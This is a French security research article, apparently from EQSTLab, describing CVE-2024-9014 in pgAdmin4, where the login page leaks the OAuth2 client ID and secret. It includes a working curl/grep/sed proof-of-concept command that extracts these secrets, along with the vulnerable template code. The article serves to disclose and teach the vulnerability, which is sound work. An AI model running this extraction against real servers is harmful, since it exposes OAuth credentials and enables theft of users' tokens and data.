
Pgadmin4 Exposition d'informations sensibles
This article est un article de recherche publié par EQSTLab.
★ CVE-2024-9014 PoC d'exposition d'informations sensibles ★
CVE-2024-9014 : Exposition d'informations sensibles dans pgAdmin4
description : les versions 8.11 et antérieures de pgAdmin sont vulnérables à une faille de sécurité dans l'authentification OAuth2. Cette vulnérabilité permet à un attaquant d'obtenir potentiellement l'identifiant et le secret du client, conduisant à un accès non autorisé aux données utilisateur.
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
pgadmin4-8.9 et pgadmin4-8.12

À ce stade, la variable config.OAUTH2_CONFIG renvoie les fichiers de configuration OAuth2, y compris OAUTH2_CLIENT_ID et OAUTH2_CLIENT_SECRET.
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
'userLanguage': user_language,
'langOptions': ns.langOptions,
'forgotPassUrl': url_for('browser.forgot_password'),
'loginUrl': url_for('authenticate.login'),
'csrfToken': csrf_token(),
'authSources': config.AUTHENTICATION_SOURCES,
'authSourcesEnum': {
'OAUTH2': config.OAUTH2,
'KERBEROS': config.KERBEROS,
},
'oauth2Config': config.OAUTH2_CONFIG,
'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}

Identifier et protéger les paramètres OAuth secrets est très important. Alors que “client_id” peut être divulgué en toute sécurité, divulguer “client_secret” présente un risque significatif. Si le client_secret est compromis, un attaquant peut exploiter l'identité et la confiance de l'application pour voler le “access token” de l'utilisateur ainsi que ses informations personnelles.
Ce dépôt n'est pas destiné à exposer des informations sensibles relatives à CVE-2024-9014. Ce projet a pour but d'aider les personnes à apprendre en quoi consiste cette vulnérabilité, et peut-être à tester leurs propres applications.
Nous publions des analyses de CVE et de malwares une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do